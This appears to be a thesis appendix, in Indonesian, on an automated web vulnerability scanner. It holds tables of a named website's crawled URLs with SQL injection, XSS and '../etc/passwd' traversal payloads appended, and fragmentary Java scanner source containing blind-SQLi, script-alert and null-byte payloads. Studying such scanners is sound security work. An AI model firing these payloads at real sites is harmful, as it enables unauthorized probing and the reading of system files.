LAMPIRAN A : Tabel

1.

Tabel 4.7 Hasil crawling sampel 1

No.

Daftar URL website

1

http://www.raahauges.com

/index.php

2

http://www.raahauges.com

/supporters.php

3

http://www.raahauges.com

/shotgun-range.php

4

http://www.raahauges.com

/hunting.php

5

http://www.raahauges.com

/sports-fair.php

6

http://www.raahauges.com

/events-calendar.php

7

http://www.raahauges.com

/contact.php

8

http://www.raahauges.com

/news.php

9

http://www.raahauges.com

/shoot-results.php

10

http://www.raahauges.com

/find-raahauges.php

11

http://www.raahauges.com

/view-news.php?id=9

12

http://www.raahauges.com

/view-news.php?id=8

13

http://www.raahauges.com

/view-news.php?id=10

14

http://www.raahauges.com

/SportsFairFlyer2014.pdf

15

http://www.raahauges.com

/index.php?prm=09&chm=-1#mini-calendar

16

http://www.raahauges.com

/index.php?prm=09&chm=1#mini-calendar

17

http://www.raahauges.com

/events-calendar.php?d=2014-09-13

18

http://www.raahauges.com

/events-calendar.php?d=2014-09-14

19

http://www.raahauges.com

/events-calendar.php?d=2014-09-17

20

http://www.raahauges.com

/events-calendar.php?d=2014-09-18

21

http://www.raahauges.com

/events-calendar.php?d=2014-09-19

22

http://www.raahauges.com

/events-calendar.php?d=2014-09-20

23

http://www.raahauges.com

/events-calendar.php?d=2014-09-21

2.

Tabel 4.8 Hasil skenario penyerangan SQL Injection sampel 1

3.

No.

Daftar URL website yang telah dimanipulasi

1

http://www.raahauges.com

/index.php%27

2

http://www.raahauges.com

/supporters.php%27

3

http://www.raahauges.com

/shotgun-range.php%27

4

http://www.raahauges.com

/hunting.php%27

5

http://www.raahauges.com

/sports-fair.php%27

6

http://www.raahauges.com

/events-calendar.php%27

7

http://www.raahauges.com

/contact.php%27

8

http://www.raahauges.com

/news.php%27

9

http://www.raahauges.com

/shoot-results.php%27

10

http://www.raahauges.com

/find-raahauges.php%27

11

http://www.raahauges.com

/view-news.php?id=9%27

12

http://www.raahauges.com

/view-news.php?id=8%27

13

http://www.raahauges.com

/view-news.php?id=10%27

14

http://www.raahauges.com

/SportsFairFlyer2014.pdf%27

15

http://www.raahauges.com

/index.php?prm=09&chm=-1#mini-calendar%27

16

http://www.raahauges.com

/index.php?prm=09&chm=1#mini-calendar%27

17

http://www.raahauges.com

/events-calendar.php?d=2014-09-13%27

18

http://www.raahauges.com

/events-calendar.php?d=2014-09-14%27

19

http://www.raahauges.com

/events-calendar.php?d=2014-09-17%27

20

http://www.raahauges.com

/events-calendar.php?d=2014-09-18%27

21

http://www.raahauges.com

/events-calendar.php?d=2014-09-19%27

22

http://www.raahauges.com

/events-calendar.php?d=2014-09-20%27

23

http://www.raahauges.com

/events-calendar.php?d=2014-09-21%27

3.

Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1

No.

Daftar URL website yang telah dimanipulasi

1

http://www.raahauges.com

/index.php%20%27%3E%3C%68%31%3E%54

%65%73%74%69%6E%67%3C%2F%68%31%3E

2

http://www.raahauges.com

/supporters.php%20%27%3E%3C%68%31%3E

%54%65%73%74%69%6E%67%3C%2F%68%31%3E

3

http://www.raahauges.com

/shotgun-range.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67

%3C%2F%68%31%3E

4

http://www.raahauges.com

/hunting.php%20%27%3E%3C%68%31%3E%5

4%65%73%74%69%6E%67%3C%2F%68%31%3E

5

http://www.raahauges.com

/sports-fair.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3

C%2F%68%31%3E

6

http://www.raahauges.com

/events-calendar.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%

67%3C%2F%68%31%3E

7

http://www.raahauges.com

/contact.php%20%27%3E%3C%68%31%3E%5

4%65%73%74%69%6E%67%3C%2F%68%31%3E

8

http://www.raahauges.com

/news.php%20%27%3E%3C%68%31%3E%54

%65%73%74%69%6E%67%3C%2F%68%31%3E

9

http://www.raahauges.com

/shoot-results.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67

%3C%2F%68%31%3E

10

http://www.raahauges.com

/find-raahauges.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E

%67%3C%2F%68%31%3E

11

http://www.raahauges.com

/view-news.php?id=9%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E

4.

Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1

No.

Daftar URL website yang telah dimanipulasi

12

http://www.raahauges.com

/view-news.php?id=8%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E

%67%3C%2F%68%31%3E

13

http://www.raahauges.com

/view-news.php?id=10%20%27%3E%3C%68%31%3E%54%65%73%74%69%6

E%67%3C%2F%68%31%3E

14

http://www.raahauges.com

/SportsFairFlyer2014.pdf%20%27%3E%3C%68

%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E

15

http://www.raahauges.com

/index.php?prm=09&chm=-1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%

3C%2F%68%31%3E

16

http://www.raahauges.com

/index.php?prm=09&chm=1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%

3C%2F%68%31%3E

17

http://www.raahauges.com

/events-calendar.php?d=2014-09-13%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

18

http://www.raahauges.com

/events-calendar.php?d=2014-09-14%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

19

http://www.raahauges.com

/events-calendar.php?d=2014-09-17%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

20

http://www.raahauges.com

/events-calendar.php?d=2014-09-18%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

21

http://www.raahauges.com

/events-calendar.php?d=2014-09-19%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

5.

Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1

No.

Daftar URL website yang telah dimanipulasi

22

http://www.raahauges.com

/events-calendar.php?d=2014-09-20%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

23

http://www.raahauges.com

/events-calendar.php?d=2014-09-21%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

24

http://www.raahauges.com

/events-calendar.php?d=2014-09-28%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2

F%68%31%3E

6.

Tabel 4.10 Hasil skenario penyerangan File Inclusion sampel 1

No.

Daftar URL website yang telah dimanipulasi

1

http://www.raahauges.com

/index.php../../../../../../../../../../etc/passwd

2

http://www.raahauges.com

/supporters.php../../../../../../../../../../etc/passwd

3

http://www.raahauges.com

/shotgun-range.php../../../../../../../../../../etc/passwd

4

http://www.raahauges.com

/hunting.php../../../../../../../../../../etc/passwd

5

http://www.raahauges.com

/sports-fair.php../../../../../../../../../../etc/passwd

6

http://www.raahauges.com

/events-calendar.php../../../../../../../../../../etc/passwd

7

http://www.raahauges.com

/contact.php../../../../../../../../../../etc/passwd

8

http://www.raahauges.com

/news.php../../../../../../../../../../etc/passwd

7.

Tabel 4.10 Hasil skenario penyerangan File Inclusion sampel

No.

Daftar URL website yang telah dimanipulasi

10

http://www.raahauges.com

/find-raahauges.php../../../../../../../../../../etc/passwd

11

http://www.raahauges.com

/view-news.php?id=9../../../../../../../../../../etc/passwd

12

http://www.raahauges.com

/view-news.php?id=8../../../../../../../../../../etc/passwd

13

http://www.raahauges.com

/view-news.php?id=10

14

http://www.raahauges.com

/SportsFairFlyer2014.pdf../../../../../../../../../../etc/pass

wd

15

http://www.raahauges.com

/index.php?prm=09&chm=-1#mini-calendar../../../../../../../../../../etc/passwd

16

http://www.raahauges.com

/index.php?prm=09&chm=1#mini-calendar../../../../../../../../../../etc/passwd

17

http://www.raahauges.com

/events-calendar.php?d=2014-09-13../../../../../../../../../../etc/passwd

18

http://www.raahauges.com

/events-calendar.php?d=2014-09-14../../../../../../../../../../etc/passwd

19

http://www.raahauges.com

/events-calendar.php?d=2014-09-17../../../../../../../../../../etc/passwd

20

http://www.raahauges.com

/events-calendar.php?d=2014-09-18../../../../../../../../../../etc/passwd

21

http://www.raahauges.com

/events-calendar.php?d=2014-09-19../../../../../../../../../../etc/passwd

22

http://www.raahauges.com

/events-calendar.php?d=2014-09-20../../../../../../../../../../etc/passwd

23

http://www.raahauges.com

/events-calendar.php?d=2014-09-21../../../../../../../../../../etc/passwd

24

http://www.raahauges.com

LAMPIRAN B: Potongan Source Code Aplikasi

public class AutoScannerSQLI extends javax.swing.JFrame { private String save[]= new String [250];

private String testBasic=""; private String testBlind=""; private String testBlind2=""; private int hasilPencarian=0; private String inputURL="";

ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();

read_byPassHttpError identifikasi = new read_byPassHttpError(null);

listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0);

inputURL= url_Site.getText();

String typeAttack = tipeSerangan.getSelectedItem().toString();

//Cek penulisan URL

if ((verifyUrl(inputURL) != null)&&(typeAttack!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai");

hasilScanSQLi.append("Situs yang di scan "+ inputURL+" \n");

hasilScanSQLi.append("Jenis Serangan SQL Injection \n"+"tipe serangan : "+ typeAttack +"\n");

listOfReportsVulnerable.add("Tipe serangan : "+ typeAttack +"\n");

} else {

}

Elements links = doc.select("a[href]"); int i=0;

} catch (IOException e) {e.printStackTrace();} }

//Fungsi ATTAck Scenario Blind Sql Injection private void attackScenarioBlindTrue(){ String serangan1="%20and%201=1--"; String serangan2="%20and%201=0--"; int size1=0, size2=0;

if((hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse))||(size1==size2)){ hasilScanSQLi.append(save[i]+" => "+"Tidak Vulnerable\n"); listOfReportsVulnerable.add(save[i]+" => "+"Tidak Vulnerable\n"); }

else {

listOfReportsVulnerable.add(save[i]+" => "+"Vulnerable");

private void attackScenarioBlindFalse(String serangan){ for(int i=0; i<save.length-1;i++){

//Fungsi fingerprinting -> untuk membaca back end dari database server

//Analisis respon yang diberikan untuk menemukan apakah rentan diserang atau tidak private void readResponAttack(String SQLTest){

2. AutoScannerXSS.java

public class AutoScannerXSS extends javax.swing.JFrame { private String listUrlXSS []= new String [250];

private String hasilRead=""; private String tipeAttack=""; private int hasilPencarian=0;

ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();}

public AutoScannerXSS() { initComponents(); }

private void scanXSSActionPerformed(java.awt.event.ActionEvent evt) { String situs =urlXSS.getText();

attackScenarioXSS("%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E");

}

else if(tipeAttack.equals("<script>alert(123)</script>")) {

attackScenarioXSS("%20<script>alert(123)</script>"); }

else if(tipeAttack.equals("'<script>alert(123);</script>")) {

attackScenarioXSS("%20'<script>alert(123);</script>"); } }

private void attackScenarioXSS(String serangan){

for( int i=0; i<listUrlXSS.length-1;i++){ if(listUrlXSS[i]!=null){

// String testXSS=listUrlXSS[i]+serangan; // listUrlXSS2[i]=listUrlXSS[i]+serangan; // readResponAttack(testXSS);

byPassError(listUrlXSS[i],serangan);

} else break;

} }

private void readResponAttack(String SQLTest){ Document doc

try {// need http protocol

doc = Jsoup.connect(SQLTest).timeout(5000)

.ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get();

// get page title

String title = doc.title();

System.out.println("title : " + title); String isi = doc.body().text();

Pattern p =Pattern.compile(tipeAttack); Matcher m = p.matcher(isi);

int start =0;

while(m.find(start)){

System.out.println("Match Found \n"+ m.group(1)+ "at position "+m.start()); start= m.end();

System.out.println("Testing : "+m.find(0)); if( m.find(0)){

hasilXSS.append(" Vulnerable"); }

else { hasilXSS.append("NO Vulnerable"); } }

3. AutoScannerFileInclusion.java

public class AutoScannerFileInclusion extends javax.swing.JFrame { private String listUrl[]= new String [250];

private String inputURL=""; private int hasilPencarian=0;

ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();

public AutoScannerFileInclusion() { initComponents(); }

listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0);

inputURL= url_Site.getText();

String serangan= tipeSerangan.getSelectedItem().toString();

if ((verifyUrl(inputURL) != null)&&(serangan!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai"); hasilScan.append("Situs yang di scan "+ inputURL+" \n");

hasilScan.append("Jenis Serangan File Inclusion \n"+"Tipe serangan : "+ serangan +"\n");

} else {

JOptionPane.showMessageDialog(null,"The entered URL is not valid. Please enter again:");

url_Site.requestFocus(); }

websiteCrawler(inputURL); //Fase Attack

if(serangan.equals("File Inclusion")){ attackScenarioFileInclusion("../"); tampil();

}

else if(serangan.equals("File Inclusion with Null")){ attackScenarioFileInclusion("../%00");

.ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get();

// get page title

String title = doc.title();

//System.out.println("title : " + title); // get all links

Elements links = doc.select("a[href]"); int i=0;

for (Element link : links) {

// System.out.println("\nlink : " + link.attr("abs:href")); if(link.attr("abs:href").contains(url)){

listUrl[i]=link.attr("abs:href"); i++;

}

}

} catch (IOException e) {

e.printStackTrace();

}

}

//Attack Skenario (Data Validation Testing)

private void attackScenarioFileInclusion(String serangan){

for( int i=0; i<listUrl.length-1;i++){ if(listUrl[i]!=null){

String testFileInclusion=listUrl[i];

byPassError(testFileInclusion,serangan);

}

else break; } }

//Finger Printing back end respon create by INdra Nababan public void byPassError(String url,String serangan) {

int size=0; String s=null; s=url+serangan; BufferedReader in=null;

try {URL obj = new URL(s);

HttpURLConnection conn = (HttpURLConnection) obj.openConnection(); conn.setReadTimeout(0);

conn.setRequestProperty("User-Agent","Mozilla/5.0 ( compatible ) "); conn.setRequestProperty("Accept","*/*");

System.out.println("Request URL ... " +s);

boolean redirect = false;

// normally, 3xx is redirect

int status = conn.getResponseCode(); if (status != HttpURLConnection.HTTP_OK) {

if (status == HttpURLConnection.HTTP_MOVED_TEMP || status == HttpURLConnection.HTTP_MOVED_PERM || status == HttpURLConnection.HTTP_SEE_OTHER)

}

System.out.println("Response Code ... " + status);

if (redirect) {

// get redirect url from "location" header field String newUrl = conn.getHeaderField("Location");

// get the cookie if need, for login

String cookies = conn.getHeaderField("Set-Cookie");

// open the new connnection again conn = (HttpURLConnection) new URL(newUrl).openConnection();

conn.setRequestProperty("Cookie", cookies); conn.setRequestProperty("User-Agent","Mozilla/5.0 ( compatible ) ");

conn.setRequestProperty("Accept","*/*");

System.out.println("Redirect to URL : " + newUrl);

}

boolean isError = conn.getResponseCode() >= 400; //The normal input stream doesn't work in error-cases. //is = isError ? con.getErrorStream() : con.getInputStream(); if(isError){

in = new BufferedReader( new InputStreamReader(conn.getErrorStream())); } else{

in = new BufferedReader( new InputStreamReader(obj.openStream())); }

String inputLine;

StringBuffer html = new StringBuffer();

while ((inputLine = in.readLine()) != null) { html.append(inputLine+"\n");

}

in.close(); String hasil=html.toString();

Pattern p =Pattern.compile("<b>Warning</b>"); Matcher m = p.matcher(hasil);

String test="";

int start =0; if(m.find(0)){

hasilScan.append(s+" => "+"VULNERABLE"+"\n");

listOfReportsVulnerable.add(url+" => "+"VULNERABLE"+"\n"); listOfReports.add(url+" => "+"VULNERABLE"+"\n");

hasilPencarian+=1; }

else {

hasilScan.append(s+" => "+"Not Vulnerable\n");

listOfReports.add(url+" => "+"Not VULNERABLE"+"\n"); }